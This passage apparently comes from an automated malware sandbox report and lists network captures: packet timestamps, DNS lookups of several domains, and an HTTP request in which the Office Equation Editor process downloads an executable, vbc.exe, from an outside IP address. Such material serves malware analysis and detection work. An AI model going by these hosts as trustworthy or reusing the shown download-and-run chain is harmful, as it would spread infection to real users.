                                      Jan 28, 2022 22:47:33.832907915 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.832940102 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.832945108 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.832978010 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.832978964 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.833013058 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.833014965 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.833048105 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.833050966 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.833086014 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.833087921 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.833123922 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.833127022 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.833158970 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.833162069 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.833194971 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.833197117 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.833230972 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.833233118 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.833265066 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.833270073 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.833301067 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.833311081 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.833337069 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.833347082 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.833374023 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.833375931 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.833411932 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.833410978 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.833446980 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.833451986 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.833482981 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.833482981 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.833518982 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.833522081 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.833555937 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.833558083 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.833592892 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.833592892 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.833630085 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.833635092 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.833667040 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.833673000 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.833704948 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.833708048 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.833738089 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.833744049 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.833775997 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.833777905 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.833812952 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.833816051 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.833859921 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.833873034 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.833915949 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.833918095 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.833955050 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.833966017 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.833988905 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.834001064 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.834028006 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.834064960 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.834064960 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.834080935 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.834100008 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.834105015 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.834135056 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.834139109 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.834171057 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.834172964 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.834204912 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.834208965 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.834242105 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.834244967 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.834279060 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.834280968 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.834315062 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.834352016 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.834363937 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.834388971 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.834389925 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.834424973 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.834455013 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.834474087 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.834476948 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.834512949 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.834513903 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.834553957 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.834585905 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.834594011 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.834594011 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.834635019 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.834639072 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.834671021 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.834675074 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.834712029 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.834712029 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.834750891 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.834765911 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.834789038 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.834789991 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.834827900 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.834827900 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.834865093 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.834867001 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.834903002 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.834906101 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.834944010 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.834947109 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.834985971 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.835017920 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.835026026 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.835062027 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.835066080 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.835076094 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.835104942 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.835105896 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.835141897 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.835144043 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.835180998 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.835184097 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.835220098 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.835222006 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.835261106 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.835263014 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.835298061 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.835300922 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.835335970 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.835338116 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.835380077 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.835381031 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.835414886 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.835418940 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.835457087 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.835469961 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.835493088 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.835496902 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.835536003 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.835541010 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.835571051 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.835576057 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.835612059 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.835616112 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.835652113 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.835653067 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.835688114 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.835691929 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.835731030 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.835736036 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.835764885 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.835767984 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.835802078 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.835807085 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.835843086 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.835846901 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.835887909 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.835889101 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.835922956 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.835928917 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.835967064 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.835997105 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.836003065 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.836004972 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.836044073 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.836060047 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.836074114 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.836081982 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.836119890 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.836129904 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.836158991 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.836169004 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.836198092 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.836199999 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.836237907 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.836239100 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.836276054 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.836277008 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.836312056 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.836314917 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.836353064 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.836354017 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.836390972 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.836393118 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.836430073 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.836432934 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.836471081 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.836502075 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.836505890 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.836510897 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.836550951 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.836554050 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.836586952 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.836586952 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.836622000 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.836627007 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.836663008 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.836664915 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.836678028 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.836703062 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.836704016 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.836741924 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.836741924 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.836776018 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.837821960 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.837867975 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.837884903 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.837924957 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.837928057 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.837969065 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.837980032 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.838006973 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.838007927 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.838048935 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.838061094 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.838087082 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.838088989 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.838126898 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.838129997 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.838165998 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.838165998 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.838203907 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.838222027 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.838243008 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.838249922 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.838280916 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.838283062 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.838320017 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.838335037 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.838357925 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.838361979 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.838399887 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.838401079 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.838438034 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.838440895 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.838473082 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.838475943 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.838514090 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.838515997 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.838551998 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.838555098 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.838594913 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.838598967 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.838632107 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.838648081 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.838670969 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.838673115 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.838711023 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.838711977 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.838747978 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.838748932 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.838784933 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.838788986 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.838826895 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.838826895 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.838866949 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.838869095 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.838902950 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.838906050 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.838943958 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.838943958 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.838979006 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.838983059 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.839020967 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.839021921 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.839055061 CET8049165103.167.92.57192.168.2.22
                                      Jan 28, 2022 22:47:33.839057922 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.839091063 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:33.866779089 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:47:34.952081919 CET4916580192.168.2.22103.167.92.57
                                      Jan 28, 2022 22:48:47.924721956 CET4916680192.168.2.22216.177.167.5
                                      Jan 28, 2022 22:48:48.107692003 CET8049166216.177.167.5192.168.2.22
                                      Jan 28, 2022 22:48:48.107894897 CET4916680192.168.2.22216.177.167.5
                                      Jan 28, 2022 22:48:48.110200882 CET4916680192.168.2.22216.177.167.5
                                      Jan 28, 2022 22:48:48.293077946 CET8049166216.177.167.5192.168.2.22
                                      Jan 28, 2022 22:48:48.293118954 CET8049166216.177.167.5192.168.2.22
                                      Jan 28, 2022 22:48:48.293133020 CET8049166216.177.167.5192.168.2.22
                                      Jan 28, 2022 22:48:48.293344975 CET4916680192.168.2.22216.177.167.5
                                      Jan 28, 2022 22:48:48.539232969 CET4916680192.168.2.22216.177.167.5
                                      Jan 28, 2022 22:48:48.722196102 CET8049166216.177.167.5192.168.2.22
                                      Jan 28, 2022 22:48:53.651304960 CET4916780192.168.2.22162.241.244.46
                                      Jan 28, 2022 22:48:53.784425020 CET8049167162.241.244.46192.168.2.22
                                      Jan 28, 2022 22:48:53.784570932 CET4916780192.168.2.22162.241.244.46
                                      Jan 28, 2022 22:48:53.784817934 CET4916780192.168.2.22162.241.244.46
                                      Jan 28, 2022 22:48:53.917655945 CET8049167162.241.244.46192.168.2.22
                                      Jan 28, 2022 22:48:54.662053108 CET8049167162.241.244.46192.168.2.22
                                      Jan 28, 2022 22:48:54.662271023 CET4916780192.168.2.22162.241.244.46
                                      Jan 28, 2022 22:48:54.795300007 CET8049167162.241.244.46192.168.2.22
                                      Jan 28, 2022 22:48:54.795382977 CET4916780192.168.2.22162.241.244.46
                                      Jan 28, 2022 22:49:10.579651117 CET4916980192.168.2.22206.188.192.2
                                      Jan 28, 2022 22:49:10.697782040 CET8049169206.188.192.2192.168.2.22
                                      Jan 28, 2022 22:49:10.697947025 CET4916980192.168.2.22206.188.192.2
                                      Jan 28, 2022 22:49:10.698079109 CET4916980192.168.2.22206.188.192.2
                                      Jan 28, 2022 22:49:10.816883087 CET8049169206.188.192.2192.168.2.22
                                      Jan 28, 2022 22:49:10.816915989 CET8049169206.188.192.2192.168.2.22
                                      Jan 28, 2022 22:49:10.817210913 CET4916980192.168.2.22206.188.192.2
                                      Jan 28, 2022 22:49:10.817285061 CET4916980192.168.2.22206.188.192.2
                                      Jan 28, 2022 22:49:10.935106039 CET8049169206.188.192.2192.168.2.22

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Jan 28, 2022 22:48:47.735872984 CET5216753192.168.2.228.8.8.8
                                      Jan 28, 2022 22:48:47.916124105 CET53521678.8.8.8192.168.2.22
                                      Jan 28, 2022 22:48:53.542433977 CET5059153192.168.2.228.8.8.8
                                      Jan 28, 2022 22:48:53.650357008 CET53505918.8.8.8192.168.2.22
                                      Jan 28, 2022 22:49:05.354998112 CET5780553192.168.2.228.8.8.8
                                      Jan 28, 2022 22:49:05.419680119 CET53578058.8.8.8192.168.2.22
                                      Jan 28, 2022 22:49:10.426671982 CET5903053192.168.2.228.8.8.8
                                      Jan 28, 2022 22:49:10.578510046 CET53590308.8.8.8192.168.2.22

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                      Jan 28, 2022 22:48:47.735872984 CET192.168.2.228.8.8.80x439cStandard query (0)www.hevenorfeed.comA (IP address)IN (0x0001)
                                      Jan 28, 2022 22:48:53.542433977 CET192.168.2.228.8.8.80x8eb8Standard query (0)www.dairatwsl.comA (IP address)IN (0x0001)
                                      Jan 28, 2022 22:49:05.354998112 CET192.168.2.228.8.8.80xc18cStandard query (0)www.vacoveco.comA (IP address)IN (0x0001)
                                      Jan 28, 2022 22:49:10.426671982 CET192.168.2.228.8.8.80xfc43Standard query (0)www.laqueenbeautybar.suppliesA (IP address)IN (0x0001)

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                      Jan 28, 2022 22:48:47.916124105 CET8.8.8.8192.168.2.220x439cNo error (0)www.hevenorfeed.com216.177.167.5A (IP address)IN (0x0001)
                                      Jan 28, 2022 22:48:53.650357008 CET8.8.8.8192.168.2.220x8eb8No error (0)www.dairatwsl.comdairatwsl.comCNAME (Canonical name)IN (0x0001)
                                      Jan 28, 2022 22:48:53.650357008 CET8.8.8.8192.168.2.220x8eb8No error (0)dairatwsl.com162.241.244.46A (IP address)IN (0x0001)
                                      Jan 28, 2022 22:49:05.419680119 CET8.8.8.8192.168.2.220xc18cName error (3)www.vacoveco.comnonenoneA (IP address)IN (0x0001)
                                      Jan 28, 2022 22:49:10.578510046 CET8.8.8.8192.168.2.220xfc43No error (0)www.laqueenbeautybar.supplies206.188.192.2A (IP address)IN (0x0001)

                                      HTTP Request Dependency Graph

                                      • 103.167.92.57
                                      • www.hevenorfeed.com
                                      • www.dairatwsl.com
                                      • www.laqueenbeautybar.supplies

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      0192.168.2.2249165103.167.92.5780C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                      TimestampkBytes transferredDirectionData
                                      Jan 28, 2022 22:47:31.331645012 CET0OUTGET /CRC/vbc.exe HTTP/1.1
                                      Accept: */*
                                      Accept-Encoding: gzip, deflate
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                      Host: 103.167.92.57
                                      Connection: Keep-Alive
                                      Jan 28, 2022 22:47:31.609735012 CET1INHTTP/1.1 200 OK
                                      Date: Fri, 28 Jan 2022 21:47:30 GMT
                                      Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                                      Last-Modified: Fri, 28 Jan 2022 10:19:01 GMT
                                      ETag: "c2800-5d6a1c37988f5"
                                      Accept-Ranges: bytes
                                      Content-Length: 796672
                                      Keep-Alive: timeout=5, max=100
                                      Connection: Keep-Alive
                                      Content-Type: application/x-msdownload
